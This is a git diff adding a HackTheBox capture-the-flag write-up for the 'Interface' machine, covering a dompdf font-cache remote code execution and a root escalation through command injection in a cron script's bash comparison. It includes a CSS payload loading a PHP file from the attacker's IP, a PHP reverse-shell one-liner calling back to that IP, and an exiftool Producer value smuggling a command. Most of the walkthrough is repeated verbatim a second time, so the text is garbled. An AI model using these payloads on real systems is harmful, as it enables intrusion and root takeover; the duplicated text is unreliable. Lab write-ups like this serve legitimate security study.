diff --git a/HackTheBox/Interface.md b/HackTheBox/Interface.md
new file mode 100644
index 0000000..7139e55
--- /dev/null
+++ b/HackTheBox/Interface.md
@@ -0,0 +1,183 @@
+# HackTheBox - Interface
+
+## NMAP
+
+```bash
+Nmap scan report for 10.10.11.200
+Host is up (0.38s latency).
+Not shown: 65533 closed tcp ports (reset)
+PORT STATE SERVICE VERSION
+22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey:
+| 2048 7289a0957eceaea8596b2d2dbc90b55a (RSA)
+| 256 01848c66d34ec4b1611f2d4d389c42c3 (ECDSA)
+|_ 256 cc62905560a658629e6b80105c799b55 (ED25519)
+80/tcp open http nginx 1.14.0 (Ubuntu)
+|_http-title: Site Maintenance
+|_http-favicon: Unknown favicon MD5: 21B739D43FCB9BBB83D8541FE4FE88FA
+| http-methods:
+|_ Supported Methods: GET HEAD
+|_http-server-header: nginx/1.14.0 (Ubuntu)
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+```
+
+## PORT 80 (HTTP)
+
+The webserver shows a note on the site about some maintenance
+
+
+
+Fuzzing for files and directories using `dirsearch`
+
+
+
+It didn't find anything from fuzzing, on checking the response headers it has some sites being shown out of which there's `prd.m.rendering-api.interface.htb`
+
+
+
+
+Here I tried fuzzing but again there were no results other than `vendor` so fuzzing there again to see if there's something accessible
+
+
+
+
+This found `/dompdf` but it's giving us 403
+
+
+
+Since this is an api from what the subdomain tells us, let's try fuzzing on `/api` for POST requests
+
+
+
+## Foothold
+
+For sending a POST request to `html2pdf` I struggled a lot in finding a proper way to send POST requests and documentaiton didn't really included that, on dompdf's github page I found that it's using `html` parameter for converting html
+
+https://github.com/dompdf/dompdf/wiki/About-Fonts-and-Character-Encoding
+
+
+With this request we'll be able to convert HTML to PDF
+
+
+
+Dompdf is vulnerable to remote code execution through loading css which then loads the font that is cached
+
+https://positive.security/blog/dompdf-rce
+
+We have our css file which is loading the font that is actually a php file executing `phpinfo()` and from the article it explains that dompdf excepts any file extension as long as header belongs to a font file
+
+```css
+@font-face {
+ font-family:'exploitfont';
+ src:url('http://10.10.14.70:9001/exploit_font.php');
+ font-weight:'normal';
+ font-style:'normal';
+ }
+```
+
+And we have our font file
+
+https://github.com/positive-security/dompdf-rce/blob/main/exploit/exploit_font.php
+
+
+
+We need to load a css with from our machine so sending a request with href
+
+```html
+"
+```
+
+
+
+
+
+To access the cached php font file we need to visit this url to access our cached font php file
+
+```
+http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/lib/fonts/fontname_fontweight/style_urlmd5hash.php
+```
+
+To calculate the hash of the url
+`http://10.10.14.70:9001/exploit_font.php`
+
+
+
+So the url becomes
+
+```
+http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/lib/fonts/exploitfont_normal_3b08b785afb0c81b1ea0920e80175f2d.php
+```
+
+
+
+We can now get rce by just adding ``
+
+
+
+With php we can get reverse shell
+
+```bash
+http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/lib/fonts/exploitfont_normal_3b08b785afb0c81b1ea0920e80175f2d.php?cmd=php%20-r%20%27$sock=fsockopen(%2210.10.14.70%22,2222);$proc=proc_open(%22/bin/sh%20-i%22,%20array(0=%3E$sock,%201=%3E$sock,%202=%3E$sock),$pipes);%27
+```
+
+
+
+## Privilege Escalation (root)
+
+Running `pspy` we see a bash script `/usr/local/sbin/cleancache.sh` being ran as root user
+
+
+
+Checking the bash script
+
+```bash
+#! /bin/bash
+cache_directory="/tmp"
+for cfile in "$cache_directory"/*; do
+ if [[ -f "$cfile" ]]; then
+ meta_producer=$(/usr/bin/exiftool -s -s -s -Producer "$cfile" 2>/dev/null | cut -d " " -f1)
+ if [[ "$meta_producer" -eq "dompdf" ]]; then
+ echo "Removing $cfile"
+ rm "$cfile"
+ fi
+ fi
+done
+```
+
+It's running `/tmp` directory where it's checking for files and `exiftool` is looking for `Producer` tag in the files and comaparing it with `-eq` if it's dompdf and if it, it will delete that file
+
+I checked the version of exiftool which was 12.55 and there wasn't any reported vulnerability for this version
+
+
+
+The vulnerability here was with in the script on the comparision
+
+```bash
+"$meta_producer" -eq "dompdf"
+```
+
+```bash
+exiftool -Producer='a[$(id)]+dompdf' ./export.pdf
+```
+
+
+
+
+
+Now we can't really use spaces here as the Producer meta data is being seperated with `cut` on a space so instead I created a bash script having the reverse shell
+
+```bash
+exiftool -Producer='a[$(/dev/shm/uwu.sh)]+dompdf' ./export.pdf
+```
+
+
+
+After transffering the file, wait for the cronjob to trigger the script
+
+
+## References
+
+- https://github.com/dompdf/dompdf/wiki/About-Fonts-and-Character-Encoding
+- https://positive.security/blog/dompdf-rce
+- https://github.com/positive-security/dompdf-rce
+- https://www.vidarholen.net/contents/blog/?p=716
+
+Fuzzing for files and directories using `dirsearch`
+
+
+
+It didn't find anything from fuzzing, on checking the response headers it has some sites being shown out of which there's `prd.m.rendering-api.interface.htb`
+
+
+
+
+Here I tried fuzzing but again there were no results other than `vendor` so fuzzing there again to see if there's something accessible
+
+
+
+
+This found `/dompdf` but it's giving us 403
+
+
+
+Since this is an api from what the subdomain tells us, let's try fuzzing on `/api` for POST requests
+
+
+
+## Foothold
+
+For sending a POST request to `html2pdf` I struggled a lot in finding a proper way to send POST requests and documentaiton didn't really included that, on dompdf's github page I found that it's using `html` parameter for converting html
+
+https://github.com/dompdf/dompdf/wiki/About-Fonts-and-Character-Encoding
+
+
+With this request we'll be able to convert HTML to PDF
+
+
+
+Dompdf is vulnerable to remote code execution through loading css which then loads the font that is cached
+
+https://positive.security/blog/dompdf-rce
+
+We have our css file which is loading the font that is actually a php file executing `phpinfo()` and from the article it explains that dompdf excepts any file extension as long as header belongs to a font file
+
+```css
+@font-face {
+ font-family:'exploitfont';
+ src:url('http://10.10.14.70:9001/exploit_font.php');
+ font-weight:'normal';
+ font-style:'normal';
+ }
+```
+
+And we have our font file
+
+https://github.com/positive-security/dompdf-rce/blob/main/exploit/exploit_font.php
+
+
+
+We need to load a css with from our machine so sending a request with href
+
+```html
+"
+```
+
+
+
+
+
+To access the cached php font file we need to visit this url to access our cached font php file
+
+```
+http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/lib/fonts/fontname_fontweight/style_urlmd5hash.php
+```
+
+To calculate the hash of the url
+`http://10.10.14.70:9001/exploit_font.php`
+
+
+
+So the url becomes
+
+```
+http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/lib/fonts/exploitfont_normal_3b08b785afb0c81b1ea0920e80175f2d.php
+```
+
+
+
+We can now get rce by just adding ``
+
+
+
+With php we can get reverse shell
+
+```bash
+http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/lib/fonts/exploitfont_normal_3b08b785afb0c81b1ea0920e80175f2d.php?cmd=php%20-r%20%27$sock=fsockopen(%2210.10.14.70%22,2222);$proc=proc_open(%22/bin/sh%20-i%22,%20array(0=%3E$sock,%201=%3E$sock,%202=%3E$sock),$pipes);%27
+```
+
+
+
+## Privilege Escalation (root)
+
+Running `pspy` we see a bash script `/usr/local/sbin/cleancache.sh` being ran as root user
+
+
+
+Checking the bash script
+
+```bash
+#! /bin/bash
+cache_directory="/tmp"
+for cfile in "$cache_directory"/*; do
+ if [[ -f "$cfile" ]]; then
+ meta_producer=$(/usr/bin/exiftool -s -s -s -Producer "$cfile" 2>/dev/null | cut -d " " -f1)
+ if [[ "$meta_producer" -eq "dompdf" ]]; then
+ echo "Removing $cfile"
+ rm "$cfile"
+ fi
+ fi
+done
+```
+
+It's running `/tmp` directory where it's checking for files and `exiftool` is looking for `Producer` tag in the files and comaparing it with `-eq` if it's dompdf and if it, it will delete that file
+
+I checked the version of exiftool which was 12.55 and there wasn't any reported vulnerability for this version
+
+
+
+The vulnerability here was with in the script on the comparision
+
+```bash
+"$meta_producer" -eq "dompdf"
+```
+
+```bash
+exiftool -Producer='a[$(id)]+dompdf' ./export.pdf
+```
+
+
+
+
+
+Now we can't really use spaces here as the Producer meta data is being seperated with `cut` on a space so instead I created a bash script having the reverse shell
+
+```bash
+exiftool -Producer='a[$(/dev/shm/uwu.sh)]+dompdf' ./export.pdf
+```
+
+
+
+After transffering the file, wait for the cronjob to trigger the script
+
+
+## References
+
+- https://github.com/dompdf/dompdf/wiki/About-Fonts-and-Character-Encoding
+- https://positive.security/blog/dompdf-rce
+- https://github.com/positive-security/dompdf-rce
+- https://www.vidarholen.net/contents/blog/?p=716